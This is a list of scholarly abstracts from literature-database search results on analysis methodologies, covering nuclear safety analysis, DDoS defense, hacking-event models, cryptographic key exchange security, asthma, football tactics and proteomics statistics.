    Sandia National Laboratories (SNL) plans to conduct uncertainty analyses (UA) on the Fukushima Daiichi unit (1F1) plant with the MELCOR code. The model to be used was developed for a previous accident reconstruction investigation jointly sponsored by the US Department of Energy (DOE) and Nuclear Regulatory Commission (NRC). However, that study only examined a handful of various model inputs and boundary conditions, and the predictions yielded only fair agreement with plant data and current release estimates. The goal of this uncertainty study is to perform a focused evaluation of uncertainty in core melt progression behavior and its effect on key figures-of-merit (e.g., hydrogen production, vessel lower head failure, etc.). In preparation for the SNL Fukushima UA work, a scoping study has been completed to identify important core melt progression parameters for the uncertainty analysis. The study also lays out a preliminary UA methodology.

  18. Mapping the Most Significant Computer Hacking Events to a Temporal Computer Attack Model

    OpenAIRE

    Heerden , Renier ,; Pieterse , Heloise; Irwin , Barry

    2012-01-01

    Part 4: Section 3: ICT for Peace and War; International audience; This paper presents eight of the most significant computer hacking events (also known as computer attacks). These events were selected because of their unique impact, methodology, or other properties. A temporal computer attack model is presented that can be used to model computer based attacks. This model consists of the following stages: Target Identification, Reconnaissance, Attack, and Post-Attack Reconnaissance stages. The...

  19. A Systematic Review of Brief Functional Analysis Methodology with Typically Developing Children

    Science.gov (United States)

    Gardner, Andrew W.; Spencer, Trina D.; Boelter, Eric W.; DuBard, Melanie; Jennett, Heather K.

    2012-01-01

    Brief functional analysis (BFA) is an abbreviated assessment methodology derived from traditional extended functional analysis methods. BFAs are often conducted when time constraints in clinics, schools or homes are of concern. While BFAs have been used extensively to identify the function of problem behavior for children with disabilities, their…

  20. An Adaptive Approach for Defending against DDoS Attacks

    Directory of Open Access Journals (Sweden)

    Muhai Li

    2010-01-01

    Full Text Available In various network attacks, the Distributed Denial-of-Service (DDoS attack is a severe threat. In order to deal with this kind of attack in time, it is necessary to establish a special type of defense system to change strategy dynamically against attacks. In this paper, we introduce an adaptive approach, which is used for defending against DDoS attacks, based on normal traffic analysis. The approach can check DDoS attacks and adaptively adjust its configurations according to the network condition and attack severity. In order to insure the common users to visit the victim server that is being attacked, we provide a nonlinear traffic control formula for the system. Our simulation test indicates that the nonlinear control approach can prevent the malicious attack packets effectively while making legitimate traffic flows arrive at the victim.

  1. Air pollution and asthma attacks in children: A case-crossover analysis in the city of Chongqing, China.

    Science.gov (United States)

    Ding, Ling; Zhu, Daojuan; Peng, Donghong; Zhao, Yao

    2017-01-01

    Data on particulate matter of diameter <2.5 μm (PM 2.5 ) in the city of Chongqing were first announced in 2013. We wished to assess the effects of pollutants on asthmatic children in Chongqing, China. Daily numbers of hospital visits because of asthma attacks in children aged 0-18 years in 2013 were collected from the Children's Hospital of Chongqing Medical University. Data on pollutants were accessed from the nine air quality-monitoring stations in Chongqing. A time-stratified case-crossover design was applied and conditional logistic regression was undertaken to analyze the data. We found that short-term exposure to PM 10 , PM 2.5 , sodium dioxide, nitrogen and carbon monoxide could trigger hospital visits for asthma in children. Nitrogen dioxide had an important role, whereas ozone had no effect. Copyright © 2016 Elsevier Ltd. All rights reserved.

  2. Reactor analysis support package (RASP). Volume 7. PWR set-point methodology. Final report

    International Nuclear Information System (INIS)

    Temple, S.M.; Robbins, T.R.

    1986-09-01

    This report provides an overview of the basis and methodology requirements for determining Pressurized Water Reactor (PWR) technical specifications related setpoints and focuses on development of the methodology for a reload core. Additionally, the report documents the implementation and typical methods of analysis used by PWR vendors during the 1970's to develop Protection System Trip Limits (or Limiting Safety System Settings) and Limiting Conditions for Operation. The descriptions of the typical setpoint methodologies are provided for Nuclear Steam Supply Systems as designed and supplied by Babcock and Wilcox, Combustion Engineering, and Westinghouse. The description of the methods of analysis includes the discussion of the computer codes used in the setpoint methodology. Next, the report addresses the treatment of calculational and measurement uncertainties based on the extent to which such information was available for each of the three types of PWR. Finally, the major features of the setpoint methodologies are compared, and the principal effects of each particular methodology on plant operation are summarized for each of the three types of PWR

  3. Development of the GO-FLOW reliability analysis methodology for nuclear reactor system

    International Nuclear Information System (INIS)

    Matsuoka, Takeshi; Kobayashi, Michiyuki

    1994-01-01

    Probabilistic Safety Assessment (PSA) is important in the safety analysis of technological systems and processes, such as, nuclear plants, chemical and petroleum facilities, aerospace systems. Event trees and fault trees are the basic analytical tools that have been most frequently used for PSAs. Several system analysis methods can be used in addition to, or in support of, the event- and fault-tree analysis. The need for more advanced methods of system reliability analysis has grown with the increased complexity of engineered systems. The Ship Research Institute has been developing a new reliability analysis methodology, GO-FLOW, which is a success-oriented system analysis technique, and is capable of evaluating a large system with complex operational sequences. The research has been supported by the special research fund for Nuclear Technology, Science and Technology Agency, from 1989 to 1994. This paper describes the concept of the Probabilistic Safety Assessment (PSA), an overview of various system analysis techniques, an overview of the GO-FLOW methodology, the GO-FLOW analysis support system, procedure of treating a phased mission problem, a function of common cause failure analysis, a function of uncertainty analysis, a function of common cause failure analysis with uncertainty, and printing out system of the results of GO-FLOW analysis in the form of figure or table. Above functions are explained by analyzing sample systems, such as PWR AFWS, BWR ECCS. In the appendices, the structure of the GO-FLOW analysis programs and the meaning of the main variables defined in the GO-FLOW programs are described. The GO-FLOW methodology is a valuable and useful tool for system reliability analysis, and has a wide range of applications. With the development of the total system of the GO-FLOW, this methodology has became a powerful tool in a living PSA. (author) 54 refs

  4. Design and analysis of sustainable computer mouse using design for disassembly methodology

    Science.gov (United States)

    Roni Sahroni, Taufik; Fitri Sukarman, Ahmad; Agung Mahardini, Karunia

    2017-12-01

    This paper presents the design and analysis of computer mouse using Design for Disassembly methodology. Basically, the existing computer mouse model consist a number of unnecessary part that cause the assembly and disassembly time in production. The objective of this project is to design a new computer mouse based on Design for Disassembly (DFD) methodology. The main methodology of this paper was proposed from sketch generation, concept selection, and concept scoring. Based on the design screening, design concept B was selected for further analysis. New design of computer mouse is proposed using fastening system. Furthermore, three materials of ABS, Polycarbonate, and PE high density were prepared to determine the environmental impact category. Sustainable analysis was conducted using software SolidWorks. As a result, PE High Density gives the lowers amount in the environmental category with great maximum stress value.

  5. Fire risk analysis for nuclear power plants: Methodological developments and applications

    International Nuclear Information System (INIS)

    Kazarians, M.; Apostolakis, G.; Siv, N.O.

    1985-01-01

    A methodology to quantify the risk from fires in nuclear power plants is described. This methodology combines engineering judgment, statistical evidence, fire phenomenology, and plant system analysis. It can be divided into two major parts: (1) fire scenario identification and quantification, and (2) analysis of the impact on plant safety. This article primarily concentrates on the first part. Statistical analysis of fire occurrence data is used to establish the likelihood of ignition. The temporal behaviors of the two competing phenomena, fire propagation and fire detection and suppression, are studied and their characteristic times are compared. Severity measures are used to further specialize the frequency of the fire scenario. The methodology is applied to a switchgear room of a nuclear power plant

  6. Critical analysis of the Bennett-Riedel attack on secure cryptographic key distributions via the Kirchhoff-Law-Johnson-noise scheme.

    Directory of Open Access Journals (Sweden)

    Laszlo B Kish

    Full Text Available Recently, Bennett and Riedel (BR (http://arxiv.org/abs/1303.7435v1 argued that thermodynamics is not essential in the Kirchhoff-law-Johnson-noise (KLJN classical physical cryptographic exchange method in an effort to disprove the security of the KLJN scheme. They attempted to demonstrate this by introducing a dissipation-free deterministic key exchange method with two batteries and two switches. In the present paper, we first show that BR's scheme is unphysical and that some elements of its assumptions violate basic protocols of secure communication. All our analyses are based on a technically unlimited Eve with infinitely accurate and fast measurements limited only by the laws of physics and statistics. For non-ideal situations and at active (invasive attacks, the uncertainly principle between measurement duration and statistical errors makes it impossible for Eve to extract the key regardless of the accuracy or speed of her measurements. To show that thermodynamics and noise are essential for the security, we crack the BR system with 100% success via passive attacks, in ten different ways, and demonstrate that the same cracking methods do not function for the KLJN scheme that employs Johnson noise to provide security underpinned by the Second Law of Thermodynamics. We also present a critical analysis of some other claims by BR; for example, we prove that their equations for describing zero security do not apply to the KLJN scheme. Finally we give mathematical security proofs for each BR-attack against the KLJN scheme and conclude that the information theoretic (unconditional security of the KLJN method has not been successfully challenged.

  7. Critical analysis of the Bennett-Riedel attack on secure cryptographic key distributions via the Kirchhoff-Law-Johnson-noise scheme.

    Science.gov (United States)

    Kish, Laszlo B; Abbott, Derek; Granqvist, Claes G

    2013-01-01

    Recently, Bennett and Riedel (BR) (http://arxiv.org/abs/1303.7435v1) argued that thermodynamics is not essential in the Kirchhoff-law-Johnson-noise (KLJN) classical physical cryptographic exchange method in an effort to disprove the security of the KLJN scheme. They attempted to demonstrate this by introducing a dissipation-free deterministic key exchange method with two batteries and two switches. In the present paper, we first show that BR's scheme is unphysical and that some elements of its assumptions violate basic protocols of secure communication. All our analyses are based on a technically unlimited Eve with infinitely accurate and fast measurements limited only by the laws of physics and statistics. For non-ideal situations and at active (invasive) attacks, the uncertainly principle between measurement duration and statistical errors makes it impossible for Eve to extract the key regardless of the accuracy or speed of her measurements. To show that thermodynamics and noise are essential for the security, we crack the BR system with 100% success via passive attacks, in ten different ways, and demonstrate that the same cracking methods do not function for the KLJN scheme that employs Johnson noise to provide security underpinned by the Second Law of Thermodynamics. We also present a critical analysis of some other claims by BR; for example, we prove that their equations for describing zero security do not apply to the KLJN scheme. Finally we give mathematical security proofs for each BR-attack against the KLJN scheme and conclude that the information theoretic (unconditional) security of the KLJN method has not been successfully challenged.

  8. A COMPARATIVE ANALYSIS OF QUALITATIVE AND QUANTITATIVE INDICATORS OF THE ATTACK PHASIS AT THE WORLD CUP IN GERMANY 2006th AND SOUTH AFRICA 2010th

    Directory of Open Access Journals (Sweden)

    Peko Vujović

    2013-07-01

    Full Text Available The subject of this paper is the recording of predefined hypothetical significant predictors for achieving goals in modern football. Concretely, the object of this study is the mode of play of top teams and individual characteristics of ellite players and comparative analysis of the last two world championships. The aim of the research was to determine the qualitative and quantitative differences between the successfully completed attacks on the World Cup in Germany in 2006 and South Africa in 2010, using a pre-defined variables. Task of the paper is to identify the set of variables that represent a good predictor for efficacy in attack phase, and which tendencies of play can be seen using of variables recorded on the sample matches in the last two world championships. The steps of work are the followers. To determine whether there are a significant differences in the positions of the players in the team, who scored a goals and assisted on two observed world championships. To determine whether there are a significant differences in the time intervals in which the goals was scored in the two above-mentioned competition. To determine whether there are a significant differences in the number of contacts with the ball at players just before successfuly implementation of attack on the mentioned competitions. And to determine whether there are a significant differences in the positions on the ground from which the goal has been scored, and from which is assisted for the goal. On the basis on the processed variables, the conclusions which have a foothold in the relevant and reliable parameters were drawn.

  9. Different methodologies in neutron activation to approach the full analysis of environmental and nutritional samples

    International Nuclear Information System (INIS)

    Freitas, M.C.; Dionisio, I.; Dung, H.M.

    2008-01-01

    Different methodologies of neutron activation analysis (NAA) are now available at the Technological and Nuclear Institute (Sacavem, Portugal), namely Compton suppression, epithermal activation, replicate and cyclic activation, and low energy photon measurement. Prompt gamma activation analysis (PGAA) will be implemented soon. Results by instrumental NAA and PGAA on environmental and nutritional samples are discussed herein, showing that PGAA - carried out at the Institute of Isotope Research (Budapest, Hungary) - brings about an effective input to assessing relevant elements. Sensitivity enhancement in NAA by Compton suppression is also illustrated. Through a judicious combination of methodologies, practically all elements of interest in pollution and nutrition terms can be determined. (author)

  10. The IDEAL (Integrated Design and Engineering Analysis Languages) modeling methodology: Capabilities and Applications

    Science.gov (United States)

    Evers, Ken H.; Bachert, Robert F.

    1987-01-01

    The IDEAL (Integrated Design and Engineering Analysis Languages) modeling methodology has been formulated and applied over a five-year period. It has proven to be a unique, integrated approach utilizing a top-down, structured technique to define and document the system of interest; a knowledge engineering technique to collect and organize system descriptive information; a rapid prototyping technique to perform preliminary system performance analysis; and a sophisticated simulation technique to perform in-depth system performance analysis.

  11. Analysis Planning Methodology: For Thesis, Joint Applied Project, & MBA Research Reports

    OpenAIRE

    Naegle, Brad R.

    2010-01-01

    Acquisition Research Handbook Series Purpose: This guide provides the graduate student researcher—you—with techniques and advice on creating an effective analysis plan, and it provides methods for focusing the data-collection effort based on that analysis plan. As a side benefit, this analysis planning methodology will help you to properly scope the research effort and will provide you with insight for changes in that effort. The information presented herein was supported b...

  12. Development of Non-LOCA Safety Analysis Methodology with RETRAN-3D and VIPRE-01/K

    International Nuclear Information System (INIS)

    Kim, Yo-Han; Cheong, Ae-Ju; Yang, Chang-Keun

    2004-01-01

    Korea Electric Power Research Institute has launched a project to develop an in-house non-loss-of-coolant-accident analysis methodology to overcome the hardships caused by the narrow analytical scopes of existing methodologies. Prior to the development, some safety analysis codes were reviewed, and RETRAN-3D and VIPRE-01 were chosen as the base codes. The codes have been modified to improve the analytical capabilities required to analyze the nuclear power plants in Korea. The methodologies of the vendors and the Electric Power Research Institute have been reviewed, and some documents of foreign utilities have been used to compensate for the insufficiencies. For the next step, a draft methodology for pressurized water reactors has been developed and modified to apply to Westinghouse-type plants in Korea. To verify the feasibility of the methodology, some events of Yonggwang Units 1 and 2 have been analyzed from the standpoints of reactor coolant system pressure and the departure from nucleate boiling ratio. The results of the analyses show trends similar to those of the Final Safety Analysis Report

  13. Methodology for object-oriented real-time systems analysis and design: Software engineering

    Science.gov (United States)

    Schoeffler, James D.

    1991-01-01

    Successful application of software engineering methodologies requires an integrated analysis and design life-cycle in which the various phases flow smoothly 'seamlessly' from analysis through design to implementation. Furthermore, different analysis methodologies often lead to different structuring of the system so that the transition from analysis to design may be awkward depending on the design methodology to be used. This is especially important when object-oriented programming is to be used for implementation when the original specification and perhaps high-level design is non-object oriented. Two approaches to real-time systems analysis which can lead to an object-oriented design are contrasted: (1) modeling the system using structured analysis with real-time extensions which emphasizes data and control flows followed by the abstraction of objects where the operations or methods of the objects correspond to processes in the data flow diagrams and then design in terms of these objects; and (2) modeling the system from the beginning as a set of naturally occurring concurrent entities (objects) each having its own time-behavior defined by a set of states and state-transition rules and seamlessly transforming the analysis models into high-level design models. A new concept of a 'real-time systems-analysis object' is introduced and becomes the basic building block of a series of seamlessly-connected models which progress from the object-oriented real-time systems analysis and design system analysis logical models through the physical architectural models and the high-level design stages. The methodology is appropriate to the overall specification including hardware and software modules. In software modules, the systems analysis objects are transformed into software objects.

  14. Towards a Multimodal Methodology for the Analysis of Translated/Localised Games

    Directory of Open Access Journals (Sweden)

    Bárbara Resende Coelho

    2016-12-01

    Full Text Available Multimedia materials require research methodologies that are able to comprehend all of their assets. Videogames are the epitome of multimedia, joining image, sound, video, animation, graphics and text with the interactivity factor. A methodology to conduct research into translation and localisation of videogames should be able to analyse all of its assets and features. This paper sets out to develop a research methodology for games and their translations/localisations that goes beyond the collection and analysis of “screenshots” and includes as many of their assets as possible. Using the fully localised version of the game Watchdogs, this papers shows how tools and technologies allow for transcending the mere analysis of linguistic contents within multimedia materials. Using software ELAN Language Archive to analyse Portuguese-language dubbed and English-language subtitled excerpts from the videogame, it was possible to identify patterns in both linguistic and audio-visual elements, as well as to correlate them.

  15. Applications of a methodology for the analysis of learning trends in nuclear power plants

    International Nuclear Information System (INIS)

    Cho, Hang Youn; Choi, Sung Nam; Yun, Won Yong

    1995-01-01

    A methodology is applied to identify the learning trend related to the safety and availability of U.S. commercial nuclear power plants. The application is intended to aid in reducing likelihood of human errors. To assure that the methodology can be easily adapted to various types of classification schemes of operation data, a data bank classified by the Transient Analysis Classification and Evaluation(TRACE) scheme is selected for the methodology. The significance criteria for human-initiated events affecting the systems and for events caused by human deficiencies were used. Clustering analysis was used to identify the learning trend in multi-dimensional histograms. A computer code is developed based on the K-Means algorithm and applied to find the learning period in which error rates are monotonously decreasing with plant age

  16. Methodology for Quantitative Analysis of Large Liquid Samples with Prompt Gamma Neutron Activation Analysis using Am-Be Source

    International Nuclear Information System (INIS)

    Idiri, Z.; Mazrou, H.; Beddek, S.; Amokrane, A.

    2009-01-01

    An optimized set-up for prompt gamma neutron activation analysis (PGNAA) with Am-Be source is described and used for large liquid samples analysis. A methodology for quantitative analysis is proposed: it consists on normalizing the prompt gamma count rates with thermal neutron flux measurements carried out with He-3 detector and gamma attenuation factors calculated using MCNP-5. The relative and absolute methods are considered. This methodology is then applied to the determination of cadmium in industrial phosphoric acid. The same sample is then analyzed by inductively coupled plasma (ICP) method. Our results are in good agreement with those obtained with ICP method.

  17. Heart Attack Payment - National

    Data.gov (United States)

    U.S. Department of Health & Human Services — Payment for heart attack patients measure – national data. This data set includes national-level data for payments associated with a 30-day episode of care for heart...

  18. Heart Attack Payment - Hospital

    Data.gov (United States)

    U.S. Department of Health & Human Services — Payment for heart attack patients measure – provider data. This data set includes provider data for payments associated with a 30-day episode of care for heart...

  19. Heart Attack Payment - State

    Data.gov (United States)

    U.S. Department of Health & Human Services — Payment for heart attack patients measure – state data. This data set includes state-level data for payments associated with a 30-day episode of care for heart...

  20. Analysis of turbulent separated flows for the NREL airfoil using anisotropic two-equation models at higher angles of attack

    Energy Technology Data Exchange (ETDEWEB)

    Zhang Shijie [Tsinghua University, Beijing (China). School of Architecture; Yuan Xin; Ye Dajun [Tsinghua University, Beijing (China). Dept. of Thermal Engineering

    2001-07-01

    Numerical simulations of the turbulent flow fields at stall conditions are presented for the NREL (National Renewable Energy Laboratory) S809 airfoil. The flow is modelled as compressible, viscous, steady/unsteady and turbulent. Four two-equation turbulence models (isotropic {kappa}-{epsilon} and q-{omega} models, anisotropic {kappa}-{epsilon} and -{omega} models), are applied to close the Reynolds-averaged Navier-Stokes equations, respectively. The governing equations are integrated in time by a new LU-type implicit scheme. To accurately model the convection terms in the mean-flow and turbulence model equations, a modified fourth-order high resolution MUSCL TVD scheme is incorporated. The large-scale separated flow fields and their losses at the stall and post-stall conditions are analyzed for the NREL S809 airfoil at various angles of attack ({alpha}) from 0 to 70 degrees. The numerical results show excellent to fairly good agreement with the experimental data. The feasibility of the present numerical method and the influence of the four turbulence models are also investigated. (author)

  1. Cooperating attackers in neural cryptography.

    Science.gov (United States)

    Shacham, Lanir N; Klein, Einat; Mislovaty, Rachel; Kanter, Ido; Kinzel, Wolfgang

    2004-06-01

    A successful attack strategy in neural cryptography is presented. The neural cryptosystem, based on synchronization of neural networks by mutual learning, has been recently shown to be secure under different attack strategies. The success of the advanced attacker presented here, called the "majority-flipping attacker," does not decay with the parameters of the model. This attacker's outstanding success is due to its using a group of attackers which cooperate throughout the synchronization process, unlike any other attack strategy known. An analytical description of this attack is also presented, and fits the results of simulations.

  2. Methodologies for uncertainty analysis in the level 2 PSA and their implementation procedures

    International Nuclear Information System (INIS)

    Ahn, Kwang Il; Yang, Joon Eun; Kim, Dong Ha

    2002-04-01

    Main purpose of this report to present standardized methodologies for uncertainty analysis in the Level 2 Probabilistic Safety Assessment (PSA) and their implementation procedures, based on results obtained through a critical review of the existing methodologies for the analysis of uncertainties employed in the Level 2 PSA, especially Accident Progression Event Tree (APET). Uncertainties employed in the Level 2 PSA, quantitative expressions of overall knowledge of analysts' and experts' participating in the probabilistic quantification process of phenomenological accident progressions ranging from core melt to containment failure, their numerical values are directly related to the degree of confidence that the analyst has that a given phenomenological event or accident process will or will not occur, or analyst's subjective probabilities of occurrence. These results that are obtained from Level 2 PSA uncertainty analysis, become an essential contributor to the plant risk, in addition to the Level 1 PSA and Level 3 PSA uncertainties. Uncertainty analysis methodologies and their implementation procedures presented in this report was prepared based on the following criteria: 'uncertainty quantification process must be logical, scrutable, complete, consistent and in an appropriate level of detail, as mandated by the Level 2 PSA objectives'. For the aforementioned purpose, this report deals mainly with (1) summary of general or Level 2 PSA specific uncertainty analysis methodologies, (2) selection of phenomenological branch events for uncertainty analysis in the APET, methodology for quantification of APET uncertainty inputs and its implementation procedure, (3) statistical propagation of uncertainty inputs through APET and its implementation procedure, and (4) formal procedure for quantification of APET uncertainties and source term categories (STCs) through the Level 2 PSA quantification codes

  3. A Methodology for the Analysis of Memory Response to Radiation through Bitmap Superposition and Slicing

    CERN Document Server

    Bosser, A.; Tsiligiannis, G.; Ferraro, R.; Frost, C.; Javanainen, A.; Puchner, H.; Rossi, M.; Saigne, F.; Virtanen, A.; Wrobel, F.; Zadeh, A.; Dilillo, L.

    2015-01-01

    A methodology is proposed for the statistical analysis of memory radiation test data, with the aim of identifying trends in the single-even upset (SEU) distribution. The treated case study is a 65nm SRAM irradiated with neutrons, protons and heavy-ions.

  4. A framework for characterizing usability requirements elicitation and analysis methodologies (UREAM)

    NARCIS (Netherlands)

    Trienekens, J.J.M.; Kusters, R.J.; Mannaert, H.

    2012-01-01

    Dedicated methodologies for the elicitation and analysis of usability requirements have been proposed in literature, usually developed by usability experts. The usability of these approaches by non-expert software engineers is not obvious. In this paper, the objective is to support developers and

  5. Cost and Benefit Analysis of an Automated Nursing Administration System: A Methodology*

    OpenAIRE

    Rieder, Karen A.

    1984-01-01

    In order for a nursing service administration to select the appropriate automated system for its requirements, a systematic process of evaluating alternative approaches must be completed. This paper describes a methodology for evaluating and comparing alternative automated systems based upon an economic analysis which includes two major categories of criteria: costs and benefits.

  6. Beyond Needs Analysis: Soft Systems Methodology for Meaningful Collaboration in EAP Course Design

    Science.gov (United States)

    Tajino, Akira; James, Robert; Kijima, Kyoichi

    2005-01-01

    Designing an EAP course requires collaboration among various concerned stakeholders, including students, subject teachers, institutional administrators and EAP teachers themselves. While needs analysis is often considered fundamental to EAP, alternative research methodologies may be required to facilitate meaningful collaboration between these…

  7. Combining soft system methodology and pareto analysis in safety management performance assessment : an aviation case

    NARCIS (Netherlands)

    Karanikas, Nektarios

    2016-01-01

    Although reengineering is strategically advantageous for organisations in order to keep functional and sustainable, safety must remain a priority and respective efforts need to be maintained. This paper suggests the combination of soft system methodology (SSM) and Pareto analysis on the scope of

  8. Methodology for reactor core physics analysis - part 2; Metodologia de analise fisica do nucleo - etapa 2

    Energy Technology Data Exchange (ETDEWEB)

    Ponzoni Filho, P; Fernandes, V B; Lima Bezerra, J de; Santos, T I.C.

    1992-12-01

    The computer codes used for reactor core physics analysis are described. The modifications introduced in the public codes and the technical basis for the codes developed by the FURNAS utility are justified. An evaluation of the impact of these modifications on the parameter involved in qualifying the methodology is included. (F.E.). 5 ref, 7 figs, 5 tabs.

  9. Understanding information exchange during disaster response: Methodological insights from infocentric analysis

    Science.gov (United States)

    Toddi A. Steelman; Branda Nowell; Deena. Bayoumi; Sarah. McCaffrey

    2014-01-01

    We leverage economic theory, network theory, and social network analytical techniques to bring greater conceptual and methodological rigor to understand how information is exchanged during disasters. We ask, "How can information relationships be evaluated more systematically during a disaster response?" "Infocentric analysis"—a term and...

  10. Methodology for LOCA analysis and its qualification procedures for PWR reload licensing

    International Nuclear Information System (INIS)

    Serrano, M.A.B.

    1986-01-01

    The methodology for LOCA analysis developed by FURNAS and its qualification procedure for PWR reload licensing are presented. Digital computer codes developed by NRC and published collectively as the WREM package were modified to get versions that comply to each requirement of Brazilian Licensing Criteria. This metodology is applied to Angra-1 basic case to conclude the qualification process. (Author) [pt

  11. Application of survival analysis methodology to the quantitative analysis of LC-MS proteomics data.

    Science.gov (United States)

    Tekwe, Carmen D; Carroll, Raymond J; Dabney, Alan R

    2012-08-01

    Protein abundance in quantitative proteomics is often based on observed spectral features derived from liquid chromatography mass spectrometry (LC-MS) or LC-MS/MS experiments. Peak intensities are largely non-normal in distribution. Furthermore, LC-MS-based proteomics data frequently have large proportions of missing peak intensities due to censoring mechanisms on low-abundance spectral features. Recognizing that the observed peak intensities detected with the LC-MS method are all positive, skewed and often left-censored, we propose using survival methodology to carry out differential expression analysis of proteins. Various standard statistical techniques including non-parametric tests such as the Kolmogorov-Smirnov and Wilcoxon-Mann-Whitney rank sum tests, and the parametric survival model and accelerated failure time-model with log-normal, log-logistic and Weibull distributions were used to detect any differentially expressed proteins. The statistical operating characteristics of each method are explored using both real and simulated datasets. Survival methods generally have greater statistical power than standard differential expression methods when the proportion of missing protein level data is 5% or more. In particular, the AFT models we consider consistently achieve greater statistical power than standard testing procedures, with the discrepancy widening with increasing missingness in the proportions. The testing procedures discussed in this article can all be performed using readily available software such as R. The R codes are provided as supplemental materials. ctekwe@stat.tamu.edu.

  12. Application of survival analysis methodology to the quantitative analysis of LC-MS proteomics data

    KAUST Repository

    Tekwe, C. D.

    2012-05-24

    MOTIVATION: Protein abundance in quantitative proteomics is often based on observed spectral features derived from liquid chromatography mass spectrometry (LC-MS) or LC-MS/MS experiments. Peak intensities are largely non-normal in distribution. Furthermore, LC-MS-based proteomics data frequently have large proportions of missing peak intensities due to censoring mechanisms on low-abundance spectral features. Recognizing that the observed peak intensities detected with the LC-MS method are all positive, skewed and often left-censored, we propose using survival methodology to carry out differential expression analysis of proteins. Various standard statistical techniques including non-parametric tests such as the Kolmogorov-Smirnov and Wilcoxon-Mann-Whitney rank sum tests, and the parametric survival model and accelerated failure time-model with log-normal, log-logistic and Weibull distributions were used to detect any differentially expressed proteins. The statistical operating characteristics of each method are explored using both real and simulated datasets. RESULTS: Survival methods generally have greater statistical power than standard differential expression methods when the proportion of missing protein level data is 5% or more. In particular, the AFT models we consider consistently achieve greater statistical power than standard testing procedures, with the discrepancy widening with increasing missingness in the proportions. AVAILABILITY: The testing procedures discussed in this article can all be performed using readily available software such as R. The R codes are provided as supplemental materials. CONTACT: ctekwe@stat.tamu.edu.

  13. Systemic design methodologies for electrical energy systems analysis, synthesis and management

    CERN Document Server

    Roboam, Xavier

    2012-01-01

    This book proposes systemic design methodologies applied to electrical energy systems, in particular analysis and system management, modeling and sizing tools. It includes 8 chapters: after an introduction to the systemic approach (history, basics & fundamental issues, index terms) for designing energy systems, this book presents two different graphical formalisms especially dedicated to multidisciplinary devices modeling, synthesis and analysis: Bond Graph and COG/EMR. Other systemic analysis approaches for quality and stability of systems, as well as for safety and robustness analysis tools are also proposed. One chapter is dedicated to energy management and another is focused on Monte Carlo algorithms for electrical systems and networks sizing. The aim of this book is to summarize design methodologies based in particular on a systemic viewpoint, by considering the system as a whole. These methods and tools are proposed by the most important French research laboratories, which have many scientific partn...

  14. Methodology for diagnosing of skin cancer on images of dermatologic spots by spectral analysis.

    Science.gov (United States)

    Guerra-Rosas, Esperanza; Álvarez-Borrego, Josué

    2015-10-01

    In this paper a new methodology for the diagnosing of skin cancer on images of dermatologic spots using image processing is presented. Currently skin cancer is one of the most frequent diseases in humans. This methodology is based on Fourier spectral analysis by using filters such as the classic, inverse and k-law nonlinear. The sample images were obtained by a medical specialist and a new spectral technique is developed to obtain a quantitative measurement of the complex pattern found in cancerous skin spots. Finally a spectral index is calculated to obtain a range of spectral indices defined for skin cancer. Our results show a confidence level of 95.4%.

  15. Methodology for national risk analysis and prioritization of toxic industrial chemicals.

    Science.gov (United States)

    Taxell, Piia; Engström, Kerstin; Tuovila, Juha; Söderström, Martin; Kiljunen, Harri; Vanninen, Paula; Santonen, Tiina

    2013-01-01

    The identification of chemicals that pose the greatest threat to human health from incidental releases is a cornerstone in public health preparedness for chemical threats. The present study developed and applied a methodology for the risk analysis and prioritization of industrial chemicals to identify the most significant chemicals that pose a threat to public health in Finland. The prioritization criteria included acute and chronic health hazards, physicochemical and environmental hazards, national production and use quantities, the physicochemical properties of the substances, and the history of substance-related incidents. The presented methodology enabled a systematic review and prioritization of industrial chemicals for the purpose of national public health preparedness for chemical incidents.

  16. Application of a new methodology on the multicycle analysis for the Laguna Verde NPP en Mexico

    International Nuclear Information System (INIS)

    Cortes C, Carlos C.

    1997-01-01

    This paper describes the improvements done in the physical and economic methodologies on the multicycle analysis for the Boiling Water Reactors of the Laguna Verde NPP in Mexico, based on commercial codes and in-house developed computational tools. With these changes in our methodology, three feasible scenarios are generated for the operation of Laguna Verde Nuclear Power Plant Unit 2 at 12, 18 and 24 months. The physical economic results obtained are showed. Further, the effect of the replacement power is included in the economic evaluation. (author). 11 refs., 3 figs., 7 tabs

  17. Defense and attack of complex and dependent systems

    International Nuclear Information System (INIS)

    Hausken, Kjell

    2010-01-01

    A framework is constructed for how to analyze the strategic defense of an infrastructure subject to attack by a strategic attacker. Merging operations research, reliability theory, and game theory for optimal analytical impact, the optimization program for the defender and attacker is specified. Targets can be in parallel, series, combined series-parallel, complex, k-out-of-n redundancy, independent, interdependent, and dependent. The defender and attacker determine how much to invest in defending versus attacking each of multiple targets. A target can have economic, human, and symbolic values, subjectively assessed by the defender and attacker. A contest success function determines the probability of a successful attack on each target, dependent on the investments by the defender and attacker into each target, and on characteristics of the contest. The defender minimizes the expected damage plus the defense costs. The attacker maximizes the expected damage minus the attack costs. Each agent is concerned about how his investments vary across the targets, and the impact on his utilities. Interdependent systems are analyzed where the defense and attack on one target impacts all targets. Dependent systems are analyzed applying Markov analysis and repeated games where a successful attack on one target in the first period impacts the unit costs of defense and attack, and the contest intensity, for the other target in the second period.

  18. Defense and attack of complex and dependent systems

    Energy Technology Data Exchange (ETDEWEB)

    Hausken, Kjell, E-mail: kjell.hausken@uis.n [Faculty of Social Sciences, University of Stavanger, N-4036 Stavanger (Norway)

    2010-01-15

    A framework is constructed for how to analyze the strategic defense of an infrastructure subject to attack by a strategic attacker. Merging operations research, reliability theory, and game theory for optimal analytical impact, the optimization program for the defender and attacker is specified. Targets can be in parallel, series, combined series-parallel, complex, k-out-of-n redundancy, independent, interdependent, and dependent. The defender and attacker determine how much to invest in defending versus attacking each of multiple targets. A target can have economic, human, and symbolic values, subjectively assessed by the defender and attacker. A contest success function determines the probability of a successful attack on each target, dependent on the investments by the defender and attacker into each target, and on characteristics of the contest. The defender minimizes the expected damage plus the defense costs. The attacker maximizes the expected damage minus the attack costs. Each agent is concerned about how his investments vary across the targets, and the impact on his utilities. Interdependent systems are analyzed where the defense and attack on one target impacts all targets. Dependent systems are analyzed applying Markov analysis and repeated games where a successful attack on one target in the first period impacts the unit costs of defense and attack, and the contest intensity, for the other target in the second period.

  19. THEORETICAL AND METHODOLOGICAL PRINCIPLES OF THE STRATEGIC FINANCIAL ANALYSIS OF CAPITAL

    Directory of Open Access Journals (Sweden)

    Olha KHUDYK

    2016-07-01

